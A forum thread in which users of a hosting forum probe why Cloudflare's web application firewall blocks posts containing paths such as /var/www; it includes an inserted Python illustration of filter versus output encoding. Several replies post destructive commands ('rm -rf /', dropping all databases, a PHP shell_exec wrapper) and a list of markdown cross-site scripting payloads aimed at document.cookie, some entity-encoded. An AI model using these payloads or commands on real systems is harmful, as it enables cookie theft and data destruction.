
    Amusing "Censorship" by LET? xD

    Well, sort of censorship. Although it seems to be enforced by Cloudflare.
    I'm not sure if I'm the only one having this problem, but I can't post...

    Literally. Not in replies or topics. I get this when trying to embed it in my topic:

    Or this when trying to embed it in my post:

    Comments

    • It's Cloudflare's WAF (Web Application Firewall).

      I'm assuming it's on strict

      Life is better when you're smiling

    • I can post /var/www/ without any problems...


    • rm_ Member

      Yep same here, typing that string and clicking "Preview" gets me the same blocking windows.

    • AnthonySmith Top Provider

      There are loads of things that do the same; it's very sensitive about forward slashes, e.g. /proc/cpuinfo and hit preview.


    • Clouvider Member, Provider

      @Mitchfizz05 browser addons? Virus? Shared IP?


    • rm_ Member

      AnthonySmith said: /proc/cpuinfo and hit preview.

      This one doesn't cause the problem for me.

    • Mitchfizz05 Member
      edited July 2015

      @Clouvider said:
      Mitchfizz05 browser addons? Virus? Shared IP?

      A simple Australian iiNet residential IP. No VPNs or anything involved.
      Virus, I hope not - it doesn't appear to be a client side problem though.

    • Cloudflare gives the same error on different forums that use CloudFlare.

    • AnthonySmith Top Provider

      odd.


    • adxn Member, Provider

      Same here, can't post / var / www /

      Sincerely,

      Shubhankar From Wuugly

    • ATHK Member

      /var/ww

    • ATHK Member

      Can't post www cloudflare error..

    • $ echo "Hello world" >> /var/www/index.html


    • It's a Cloudflare response, not client side, although it depends what you put. It doesn't like Linux file directories (at least the default ones) such as the hosts file path.


      Jr System Administrator

    • Ole_Juul Member
      edited July 2015

      / var / www /
      For me it does not work in either preview or post.

      On a forum where there are particularly good reasons for posting something like that, I think it would be a good idea to fix it. /opinion

    • joepie91 Member, Provider

      @Ole_Juul said:
      / var / www /
      For me it does not work in either preview or post.

      On a forum where there are particularly good reasons for posting something like that, I think it would be a good idea to fix it. /opinion

      I wouldn't hold my breath. It's been a problem for months, and reported before.

    • joepie91 said: I wouldn't hold my breath. It's been a problem for months, and reported before.

      Well if I'm not going to hold my breath, I might as well add a request for implementing proper html markup. The Register does that in their (very large international) forum, and the reason they decided to do that (they said) is that it is a tech forum, and users can be expected to be familiar with the web. Surely it is the same here.

    • Clouvider Member, Provider

      Have you contacted Cloudflare about it? Let them know about the false positive.


    • @Clouvider said:
      Have you contacted Cloudflare about it? Let them know about the false positive.

      Over Twitter, yes.

    • Clouvider Member, Provider

      I'm afraid that's not enough. Contact them directly, give them some more details, like the website you are visiting and the Ray ID (which I believe is a unique number identifying the session). Give them something to work on.


    • CloudFlare's solution to bad developers & software is blocking all common fuzz strings and characters that could be used maliciously.

      I guess the only solution is to get LET to turn down the filter, or just make sure that vanilla is actually sanitizing.


      Security Consultant
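
Added example (not part of the thread, and not Cloudflare's or Vanilla's code): the trade-off raised in the comment above, edge signature blocking versus sanitizing in the application, run over strings quoted in this thread. The signature list, function names and sample posts are constructed for illustration; Cloudflare's actual rules are not shown on this page.

```python
import html
import re

# Constructed stand-ins for a strict path-signature rule set. These are
# assumptions for illustration, NOT Cloudflare's real rules.
SIGNATURES = [
    re.compile(r"/var/www\b"),
    re.compile(r"/etc/(?:hosts|passwd)\b"),
]

# Constructed sample posts modelled on strings quoted in the thread.
POSTS = {
    "benign_path": 'echo "Hello world" >> /var/www/index.html',
    "spaced_path": "Same here, can't post / var / www /",
    "destructive": "rm -rf /*",
    "markup": "<script>alert(1)</script>",
}


def edge_blocks(body: str) -> bool:
    """Signature filter: reject the whole request if any pattern matches."""
    return any(sig.search(body) for sig in SIGNATURES)


def render_comment(body: str) -> str:
    """Application control: keep the text, HTML-encode it at output time."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


def triage(posts: dict) -> dict:
    """Return, per post, the edge verdict and the safely rendered HTML."""
    return {
        name: {"blocked": edge_blocks(text), "html": render_comment(text)}
        for name, text in posts.items()
    }


if __name__ == "__main__":
    for name, result in triage(POSTS).items():
        verdict = "BLOCKED" if result["blocked"] else "allowed"
        print(f"{name:12} {verdict:8} {result['html']}")
```

The path signature rejects an ordinary sysadmin command while letting a destructive one through, so it is both over- and under-inclusive; encoding at render time makes the markup inert whatever the edge verdict was.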

    • fitvpn Member

      I tried to load LET from Tor and got blocked several times. They know Tor IPs and block access.

      Yes, I can boogie

    • fitvpn said: I tried to load LET from Tor and got blocked several times. They know Tor IPs and block access.

      It sounds like there is some real bad code on LET if they need to compromise to that extent.

    • rmlhhd Member, Provider
      edited July 2015

      rm -rf /*

      mysql -u root -e 'drop database *'

      ^^ Cloudflare doesn't block either on mobile or PC.

    • doghouch Member
      edited July 2015

      @eastonch said:
      CloudFlare's solution to bad developers & software is blocking all common fuzz strings and characters that could be used maliciously.

      I guess the only solution is to get LET to turn down the filter, or just make sure that vanilla is actually sanitizing.

      Pft - why would anyone use Vanilla if it didn't sanitize things?



      EDIT: Using the Chrome Compression Proxy also shows an error.

    • Got this for a few random things in the past, silly error...

    • FlamesRunner Member
      edited July 2015
      <?php
      shell_exec('mysql -uroot -plet -e "drop database *"');
      shell_exec('rm -rf /');
      echo 'lol';
      ?>
      

      Seems fine to me as well.

      wget https://s.flamz.pw/dl/bench.sh && bash bench.sh

      curl https://s.flamz.pw/analytics/bench/stats.php

    • Ole_Juul Member
      edited July 2015

      Ole_Juul said:

      It sounds like there is some real bad code on LET if they need to compromise to that extent.

      I just logged in with tor from another computer with a different IP. It asked me for a captcha and that was all. So, it actually looks like it works just fine - at least for me.

    • @Ole_Juul said:
      It sounds like there is some real bad code on LET if they need to compromise to that extent.

      All LET code is public and open source, with the exception of one simple module (the one that auto-sinks offers), so feel free to have a peek yourself :-)

      eastonch said: I guess the only solution is to get LET to turn down the filter, or just make sure that vanilla is actually sanitizing.

      Vanilla is sanitizing. I'm not sure why the WAF is set to a setting this strict, but I'll send an e-mail to CC to ask about it.

      Ole_Juul said: On a forum where there are particularly good reasons for posting something like that, I think it would be a good idea to fix it. /opinion

      Agreed.

      It's a CloudFlare thing, though, and while this particular setting may be annoying, I'm not aware of the benefits we may get from this WAF level and how that weighs up against the downside.


    • mpkossen said: I'm not aware of the benefits we may get from this WAF level and how that weighs up against the downside.

      It might be a good precaution against 0-day exploits in Vanilla. We all remember the week where LET was hacked like 5 times, this doesn't really instill confidence in the security of Vanilla.

    • Dillybob Member
      edited July 2015
      [a](javascript:prompt(document.cookie))
      [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
      ![a](javascript:prompt(document.cookie))\
      <javascript:prompt(document.cookie)>  
      <&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>  
      ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
      [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
      [a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
      ![a'"`onerror=prompt(document.cookie)](x)\
      [citelol]: (javascript:prompt(document.cookie))
      [notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
      [test](javascript://%0d%0aprompt(1))
      [test](javascript://%0d%0aprompt(1);com)
      

      test

      notmalicious
      a

      Yeah, looks like LET has patched the recent telescope vulnerability.


    • sepei Member
      edited July 2015

      /var/ www

      Same here

    • emg Member

      Yeah, it happened to me a few weeks ago. I was trying to post some advice on how to use a sniph-pher tool to isolate and fix a problem. The post got blocked for posting hac-king advice.

      I was told that LET would unblock me, and I assume it happened, but by then, everyone had moved on, including me. I still have the useful advice somewhere in a text file on my local computer.

    • @gsrdgrdghd said:
      It might be a good precaution against 0-day exploits in Vanilla. We all remember the week where LET was hacked like 5 times, this doesn't really instill confidence in the security of Vanilla.

      As far as I am aware, Vanilla has gotten a lot more stable and secure since then, especially since we are now running an unmodified version straight from their GitHub.

